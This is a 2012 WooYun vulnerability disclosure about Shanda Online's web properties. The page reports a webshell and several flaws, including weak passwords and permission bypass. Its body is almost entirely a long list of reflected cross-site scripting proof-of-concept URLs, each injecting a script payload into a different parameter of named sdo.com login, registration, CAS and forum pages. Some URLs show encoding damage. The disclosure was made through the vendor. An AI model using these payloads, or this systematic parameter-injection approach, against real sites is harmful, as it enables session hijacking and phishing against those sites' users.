当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-07510

漏洞标题:盛大在线漏洞集合已拿到webshell,不方便进一步提权。

相关厂商:盛大在线

漏洞作者: zeracker

提交时间:2012-05-25 05:03

修复时间:2012-07-09 05:04

公开时间:2012-07-09 05:04

漏洞类型:账户体系控制不严

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2012-05-25: 细节已通知厂商并且等待厂商处理中
2012-05-25: 厂商已经确认,细节仅向厂商公开
2012-06-04: 细节向核心白帽子及相关领域专家公开
2012-06-14: 细节向普通白帽子公开
2012-06-24: 细节向实习白帽子公开
2012-07-09: 细节向公众公开

简要描述:

感谢木木童鞋晚上一起出去喝可乐,喝醉后, 暴走了。。
--------------------------------------------------
盛大在线漏洞集合已拿到webshell,不方便进一步提权。
存在大量脚本跨站漏洞
url跳转漏洞
权限绕过
弱口令
后台暴漏
报错
上传页面
遍历漏洞
等等。。
如果要送礼物就送双份哈。嘎嘎嘎。。

详细说明:







http://login.sdo.com/sdo/Login/LoginFrameFC.php?appId=207&areaId=1&loginifrmId=iframeLogin&proxyUrl=http://www.sdo.com/proxy.html&returnURL=http://iq.sdo.com&backUrl=http://iq.sdo.com&CSSURL=http://iq.sdo.com/Style/IframeLogin.css&username=&password=&templateId='"><script>alert(2037769);</script><"&sdid=&infoEx=&uid=&appArea=1&service=http://iq.sdo.com&code=2&pageType=0&autoLogin=0&saveTime=14&loginCustomerUrl=http://login.sdo.com/sdo/Login/LoginSDO.php?service=http://iq.sdo.com&encryptFlag=0
http://login.sdo.com/sdo/Login/LoginFrameFC.php?appId=207&areaId=1&loginifrmId=iframeLogin&proxyUrl=http://www.sdo.com/proxy.html&returnURL=http://iq.sdo.com&backUrl=http://iq.sdo.com&CSSURL=http://iq.sdo.com/Style/IframeLogin.css&username=&password=&templateId=&sdid='"><script>alert(5144459);</script><"&infoEx=&uid=&appArea=1&service=http://iq.sdo.com&code=2&pageType=0&autoLogin=0&saveTime=14&loginCustomerUrl=http://login.sdo.com/sdo/Login/LoginSDO.php?service=http://iq.sdo.com&encryptFlag=0
http://login.sdo.com/sdo/Login/LoginFrameFC.php?appId=207&areaId=1&loginifrmId=iframeLogin&proxyUrl=http://www.sdo.com/proxy.html&returnURL=http://iq.sdo.com&backUrl=http://iq.sdo.com&CSSURL=http://iq.sdo.com/Style/IframeLogin.css&username=&password=&templateId=&sdid=&infoEx='"><script>alert(1556958);</script><"&uid=&appArea=1&service=http://iq.sdo.com&code=2&pageType=0&autoLogin=0&saveTime=14&loginCustomerUrl=http://login.sdo.com/sdo/Login/LoginSDO.php?service=http://iq.sdo.com&encryptFlag=0
http://login.sdo.com/sdo/Login/LoginFrameFC.php?appId=207&areaId=1&loginifrmId=iframeLogin&proxyUrl=http://www.sdo.com/proxy.html&returnURL=http://iq.sdo.com&backUrl=http://iq.sdo.com&CSSURL=http://iq.sdo.com/Style/IframeLogin.css&username=&password=&templateId=&sdid=&infoEx=&uid='"><script>alert(4662558);</script><"&appArea=1&service=http://iq.sdo.com&code=2&pageType=0&autoLogin=0&saveTime=14&loginCustomerUrl=http://login.sdo.com/sdo/Login/LoginSDO.php?service=http://iq.sdo.com&encryptFlag=0
http://login.sdo.com/sdo/Login/LoginFrameFC.php?appId=207&areaId=1&loginifrmId=iframeLogin&proxyUrl=http://www.sdo.com/proxy.html&returnURL=http://iq.sdo.com&backUrl=http://iq.sdo.com&CSSURL=http://iq.sdo.com/Style/IframeLogin.css&username=&password=&templateId=&sdid=&infoEx=&uid=&appArea=1&service=http://iq.sdo.com&code=2&pageType='"><script>alert(4127734);</script><"&autoLogin=0&saveTime=14&loginCustomerUrl=http://login.sdo.com/sdo/Login/LoginSDO.php?service=http://iq.sdo.com&encryptFlag=0
http://app.help.sdo.com/sdohelp.ashx?gameid=200012500&area=4000&type=3&maxlen=10&maxnum=4&src='"><script>alert(9968761);</script><"&ver=0
http://register.sdo.com/gaea/phone_default.aspx?from=121&zone='"><script>alert(6504626);</script><"
http://register.sdo.com/gaea/phone_default.aspx?from=121&zone=nav&ptType='"><script>alert(8684335);</script><"®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=nav&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&attcode2=123456&showPTInfoSection=&vendorPhoneId=&modelPhoneId=
http://register.sdo.com/gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid='"><script>alert(5536731);</script><"&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=nav&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&attcode2=123456&showPTInfoSection=&vendorPhoneId=&modelPhoneId=
http://cy.sdo.com/bbs/?formhash=ba4a947f&referer=%22%3E%3Cscript%3Ealert%287161522%29%3B%3C/script%3E&cookietime=2592000
http://register.sdo.com/gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid='"><script>alert(8207517);</script><"&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=nav&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&attcode2=123456&showPTInfoSection=&vendorPhoneId=&modelPhoneId=
http://register.sdo.com/gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001='"><script>alert(7736705);</script><"&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=nav&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&attcode2=123456&showPTInfoSection=&vendorPhoneId=&modelPhoneId=
http://register.sdo.com/gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002='"><script>alert(5674032);</script><"&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=nav&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&attcode2=123456&showPTInfoSection=&vendorPhoneId=&modelPhoneId=
http://register.sdo.com/gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001='"><script>alert(1022590);</script><"&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=nav&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&attcode2=123456&showPTInfoSection=&vendorPhoneId=&modelPhoneId=
http://register.sdo.com/gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002='"><script>alert(0541698);</script><"&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=nav&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&attcode2=123456&showPTInfoSection=&vendorPhoneId=&modelPhoneId=
http://register.sdo.com/gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck='"><script>alert(5374185);</script><"&txtRegisterFrom=121&txtRegisterZone=nav&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&attcode2=123456&showPTInfoSection=&vendorPhoneId=&modelPhoneId=
http://register.sdo.com/gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom='"><script>alert(3302573);</script><"&txtRegisterZone=nav&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&attcode2=123456&showPTInfoSection=&vendorPhoneId=&modelPhoneId=
http://register.sdo.com/gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone='"><script>alert(0268717);</script><"&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&attcode2=123456&showPTInfoSection=&vendorPhoneId=&modelPhoneId=
http://register.sdo.com/gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=nav&sessionid='"><script>alert(9291599);</script><"&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&attcode2=123456&showPTInfoSection=&vendorPhoneId=&modelPhoneId=
http://register.sdo.com/gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=nav&sessionid=&goldtype='"><script>alert(4401657);</script><"&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&attcode2=123456&showPTInfoSection=&vendorPhoneId=&modelPhoneId=
http://register.sdo.com/gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=nav&sessionid=&goldtype=&partner='"><script>alert(3207573);</script><"&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&attcode2=123456&showPTInfoSection=&vendorPhoneId=&modelPhoneId=
http://register.sdo.com/gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=nav&sessionid=&goldtype=&partner=&apptype='"><script>alert(0399132);</script><"&agent=&ctype=&hidExinfo=&qqaccount=&attcode2=123456&showPTInfoSection=&vendorPhoneId=&modelPhoneId=
http://register.sdo.com/gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=nav&sessionid=&goldtype=&partner=&apptype=&agent='"><script>alert(1523222);</script><"&ctype=&hidExinfo=&qqaccount=&attcode2=123456&showPTInfoSection=&vendorPhoneId=&modelPhoneId=
http://register.sdo.com/gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=nav&sessionid=&goldtype=&partner=&apptype=&agent=&ctype='"><script>alert(3169019);</script><"&hidExinfo=&qqaccount=&attcode2=123456&showPTInfoSection=&vendorPhoneId=&modelPhoneId=
https://cas.sdo.com/cas/loginStateService?method='"><script>alert(5794917);</script><"
http://register.sdo.com/gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=nav&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo='"><script>alert(4349020);</script><"&qqaccount=&attcode2=123456&showPTInfoSection=&vendorPhoneId=&modelPhoneId=
http://login.sdo.com/sdo/Login/LoginFrame.php?appDomain=tuita.com&appId='"><script>alert(6740555);</script><"&appArea=0&returnURL=http%3A%2F%2Fwww.tuita.com%2Flogin%3Frefer%3D&CSSURL=http%3A%2F%2Fwww.tuita.com%2Fhtml%2Flogin%2Fcss%2FIframeLogin.css%3F20150524184201&autologinchecked=1&autologintime=14&autologintext=%E4%B8%8B%E6%AC%A1%E8%87%AA%E5%8A%A8%E7%99%BB%E5%BD%95&autologinwaitingmsg=%E8%87%AA%E5%8A%A8%E7%99%BB%E5%BD%95%E4%B8%AD...&curURL=http%3A%2F%2Fwww.tuita.com%2Flogin%3Frefer%3D&usernamePlaceHolder=%E6%89%8B%E6%9C%BA%2F%E9%82%AE%E7%AE%B1%2F%E4%B8%AA%E6%80%A7%E5%8C%96%E5%B8%90%E5%8F%B7
http://register.sdo.com/gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=nav&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount='"><script>alert(1806599);</script><"&attcode2=123456&showPTInfoSection=&vendorPhoneId=&modelPhoneId=
http://login.sdo.com/sdo/Login/LoginFrame.php?appDomain=tuita.com&appId=256&appArea='"><script>alert(2257886);</script><"&returnURL=http%3A%2F%2Fwww.tuita.com%2Flogin%3Frefer%3D&CSSURL=http%3A%2F%2Fwww.tuita.com%2Fhtml%2Flogin%2Fcss%2FIframeLogin.css%3F20150524184201&autologinchecked=1&autologintime=14&autologintext=%E4%B8%8B%E6%AC%A1%E8%87%AA%E5%8A%A8%E7%99%BB%E5%BD%95&autologinwaitingmsg=%E8%87%AA%E5%8A%A8%E7%99%BB%E5%BD%95%E4%B8%AD...&curURL=http%3A%2F%2Fwww.tuita.com%2Flogin%3Frefer%3D&usernamePlaceHolder=%E6%89%8B%E6%9C%BA%2F%E9%82%AE%E7%AE%B1%2F%E4%B8%AA%E6%80%A7%E5%8C%96%E5%B8%90%E5%8F%B7
http://register.sdo.com/gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=nav&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&attcode2='"><script>alert(8264758);</script><"&showPTInfoSection=&vendorPhoneId=&modelPhoneId=
http://register.sdo.com/gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=nav&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&attcode2=123456&showPTInfoSection='"><script>alert(1415861);</script><"&vendorPhoneId=&modelPhoneId=
http://register.sdo.com/gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=nav&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&attcode2=123456&showPTInfoSection=&vendorPhoneId='"><script>alert(3646133);</script><"&modelPhoneId=
http://register.sdo.com/gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=nav&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&attcode2=123456&showPTInfoSection=&vendorPhoneId=&modelPhoneId='"><script>alert(7313563);</script><"
http://login.sdo.com/sdo/Login/LoginFrame.php?appDomain=tuita.com&appId=256&appArea=0&returnURL=http://www.tuita.com/login?refer=&CSSURL=http://www.tuita.com/html/login/css/IframeLogin.css?20150524184201&autologinchecked=1&autologintime=14&autologintext=涓嬫鑷姩鐧诲綍&autologinwaitingmsg=鑷姩鐧诲綍涓�...&curURL=http://www.tuita.com/login?refer=&usernamePlaceHolder=鎵嬫満/閭/涓€у寲甯愬彿&username=&password=&templateId='"><script>alert(5504003);</script><"&sdid=&infoEx=&uid=&service=http://www.tuita.com/login?refer=&code=2&pageType=0&autoLogin=&saveTime=14&loginCustomerUrl=http://www.tuita.com/login?refer=&encryptFlag=0
https://cas.sdo.com/cas/login?service='"><script>alert(1926402);</script><"&gateway=true
http://login.sdo.com/sdo/Login/LoginFrame.php?appDomain=tuita.com&appId=256&appArea=0&returnURL=http://www.tuita.com/login?refer=&CSSURL=http://www.tuita.com/html/login/css/IframeLogin.css?20150524184201&autologinchecked=1&autologintime=14&autologintext=涓嬫鑷姩鐧诲綍&autologinwaitingmsg=鑷姩鐧诲綍涓�...&curURL=http://www.tuita.com/login?refer=&usernamePlaceHolder=鎵嬫満/閭/涓€у寲甯愬彿&username=&password=&templateId=&sdid='"><script>alert(3542305);</script><"&infoEx=&uid=&service=http://www.tuita.com/login?refer=&code=2&pageType=0&autoLogin=&saveTime=14&loginCustomerUrl=http://www.tuita.com/login?refer=&encryptFlag=0
http://login.sdo.com/sdo/Login/LoginFrame.php?appDomain=tuita.com&appId=256&appArea=0&returnURL=http://www.tuita.com/login?refer=&CSSURL=http://www.tuita.com/html/login/css/IframeLogin.css?20150524184201&autologinchecked=1&autologintime=14&autologintext=涓嬫鑷姩鐧诲綍&autologinwaitingmsg=鑷姩鐧诲綍涓�...&curURL=http://www.tuita.com/login?refer=&usernamePlaceHolder=鎵嬫満/閭/涓€у寲甯愬彿&username=&password=&templateId=&sdid=&infoEx='"><script>alert(6112296);</script><"&uid=&service=http://www.tuita.com/login?refer=&code=2&pageType=0&autoLogin=&saveTime=14&loginCustomerUrl=http://www.tuita.com/login?refer=&encryptFlag=0
http://login.sdo.com/sdo/Login/LoginFrame.php?appDomain=tuita.com&appId=256&appArea=0&returnURL=http://www.tuita.com/login?refer=&CSSURL=http://www.tuita.com/html/login/css/IframeLogin.css?20150524184201&autologinchecked=1&autologintime=14&autologintext=涓嬫鑷姩鐧诲綍&autologinwaitingmsg=鑷姩鐧诲綍涓�...&curURL=http://www.tuita.com/login?refer=&usernamePlaceHolder=鎵嬫満/閭/涓€у寲甯愬彿&username=&password=&templateId=&sdid=&infoEx=&uid='"><script>alert(1535785);</script><"&service=http://www.tuita.com/login?refer=&code=2&pageType=0&autoLogin=&saveTime=14&loginCustomerUrl=http://www.tuita.com/login?refer=&encryptFlag=0
http://login.sdo.com/sdo/Login/LoginFrame.php?appDomain=tuita.com&appId=256&appArea=0&returnURL=http://www.tuita.com/login?refer=&CSSURL=http://www.tuita.com/html/login/css/IframeLogin.css?20150524184201&autologinchecked=1&autologintime=14&autologintext=涓嬫鑷姩鐧诲綍&autologinwaitingmsg=鑷姩鐧诲綍涓�...&curURL=http://www.tuita.com/login?refer=&usernamePlaceHolder=鎵嬫満/閭/涓€у寲甯愬彿&username=&password=&templateId=&sdid=&infoEx=&uid=&service=http://www.tuita.com/login?refer=&code=2&pageType='"><script>alert(6920369);</script><"&autoLogin=&saveTime=14&loginCustomerUrl=http://www.tuita.com/login?refer=&encryptFlag=0
http://jf.sdo.com/Partner/PromotionList.aspx?type='"><script>alert(3820307);</script><"
http://lt.abc.sdo.com/knowledge/ClassShow/11690?queryString='"><script>alert(6392999);</script><"&idx=11690
http://lt.abc.sdo.com/knowledge/ClassShow/11689?queryString='"><script>alert(8150974);</script><"&idx=11689
http://lt.abc.sdo.com/knowledge/ClassShow/11690?queryString=1&idx='"><script>alert(7444296);</script><"
http://lt.abc.sdo.com/knowledge/ClassShow/11688?queryString='"><script>alert(7444296);</script><"&idx=11688
http://lt.abc.sdo.com/knowledge/ClassShow/11687?queryString='"><script>alert(6400969);</script><"&idx=11687
http://lt.abc.sdo.com/knowledge/ClassShow/11695?queryString='"><script>alert(2856795);</script><"&idx=11695
http://lt.abc.sdo.com/knowledge/ClassShow/11689?queryString=1&idx='"><script>alert(6953485);</script><"
http://lt.abc.sdo.com/knowledge/ClassShow/11688?queryString=1&idx='"><script>alert(1265984);</script><"
http://lt.abc.sdo.com/knowledge/ClassShow/11695?queryString=1&idx='"><script>alert(1265984);</script><"
http://lt.abc.sdo.com/knowledge/ClassShow/11687?queryString=1&idx='"><script>alert(8689273);</script><"
http://lt.abc.sdo.com/knowledge/ClassShow/11693?queryString='"><script>alert(8689273);</script><"&idx=11693
http://lt.abc.sdo.com/knowledge/ClassShow/11693?queryString=1&idx='"><script>alert(7152569);</script><"
http://ga.abc.sdo.com/knowledge/ClassShow/12569?queryString='"><script>alert(0805996);</script><"&idx=12569
http://ga.abc.sdo.com/knowledge/ClassShow/12569?queryString=1&idx=';</script><script>alert(0805996);</script>
http://ga.abc.sdo.com/knowledge/ClassShow/11578?queryString='"><script>alert(2240958);</script><"&idx=11578
http://ga.abc.sdo.com/knowledge/ClassShow/11583?queryString='"><script>alert(5647584);</script><"&idx=11583
http://ga.abc.sdo.com/knowledge/ClassShow/11584?queryString=1&idx='"><script>alert(9843284);</script><"
http://ga.abc.sdo.com/knowledge/ClassShow/11578?queryString=1&idx='"><script>alert(1950983);</script><"
http://ga.abc.sdo.com/knowledge/ClassShow/11583?queryString=1&idx='"><script>alert(3686881);</script><"
http://register.sdo.com/gaea/input_pt.aspx?from=121&zone='"><script>alert(6215670);</script><"
http://register.sdo.com/gaea/phone_overseas.aspx?from='"><script>alert(2192155);</script><"&zone=nav
http://register.sdo.com/gaea/phone_overseas.aspx?from=121&zone='"><script>alert(0314432);</script><"
http://register.sdo.com/gaea/phone_overseas.aspx?from=121&zone=nav&ptType='"><script>alert(9646418);</script><"®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&showPTInfoSection=
http://register.sdo.com/gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid='"><script>alert(8079841);</script><"&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&showPTInfoSection=
http://register.sdo.com/gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid=&chksdid='"><script>alert(1210537);</script><"&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&showPTInfoSection=
http://register.sdo.com/gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid=&chksdid=false&hidRecName001='"><script>alert(2465525);</script><"&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&showPTInfoSection=
http://register.sdo.com/gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid=&chksdid=false&hidRecName001=&hidRecName002='"><script>alert(9923001);</script><"&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&showPTInfoSection=
http://register.sdo.com/gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001='"><script>alert(5280583);</script><"&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&showPTInfoSection=
http://register.sdo.com/gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002='"><script>alert(3117847);</script><"&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&showPTInfoSection=
http://register.sdo.com/gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck='"><script>alert(2649984);</script><"&txtRegisterFrom=121&txtRegisterZone=&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&showPTInfoSection=
http://register.sdo.com/gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom='"><script>alert(9053711);</script><"&txtRegisterZone=&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&showPTInfoSection=
http://register.sdo.com/gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone='"><script>alert(7347684);</script><"&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&showPTInfoSection=
http://register.sdo.com/gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=&sessionid='"><script>alert(4972556);</script><"&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&showPTInfoSection=
http://register.sdo.com/gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=&sessionid=&goldtype='"><script>alert(5027418);</script><"&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&showPTInfoSection=
http://register.sdo.com/gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=&sessionid=&goldtype=&partner='"><script>alert(2585428);</script><"&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&showPTInfoSection=
http://register.sdo.com/gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=&sessionid=&goldtype=&partner=&apptype='"><script>alert(4100227);</script><"&agent=&ctype=&hidExinfo=&qqaccount=&showPTInfoSection=
http://register.sdo.com/gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=&sessionid=&goldtype=&partner=&apptype=&agent='"><script>alert(1049614);</script><"&ctype=&hidExinfo=&qqaccount=&showPTInfoSection=
http://register.sdo.com/gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=&sessionid=&goldtype=&partner=&apptype=&agent=&ctype='"><script>alert(3785412);</script><"&hidExinfo=&qqaccount=&showPTInfoSection=
http://register.sdo.com/gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo='"><script>alert(2769998);</script><"&qqaccount=&showPTInfoSection=
http://register.sdo.com/gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount='"><script>alert(9116294);</script><"&showPTInfoSection=
http://register.sdo.com/gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&showPTInfoSection='"><script>alert(6583770);</script><"
http://cy.sdo.com/bbs/index.php?formhash=ba4a947f&referer=%22%3E%3Cscript%3Ealert%287151867%29%3B%3C/script%3E&cookietime=2592000
http://cy.sdo.com/bbs/register.php?formhash=ba4a947f&referer=%22%3E%3Cscript%3Ealert%282564266%29%3B%3C/script%3E&cookietime=2592000
http://cy.sdo.com/bbs/memcp.php?formhash=ba4a947f&referer=%22%3E%3Cscript%3Ealert%285235041%29%3B%3C/script%3E&cookietime=2592000
http://cy.sdo.com/bbs/medal.php?formhash=ba4a947f&referer=%22%3E%3Cscript%3Ealert%283273439%29%3B%3C/script%3E&cookietime=2592000
http://cy.sdo.com/bbs/stats.php?formhash=ba4a947f&referer=%22%3E%3Cscript%3Ealert%286380139%29%3B%3C/script%3E&cookietime=2592000
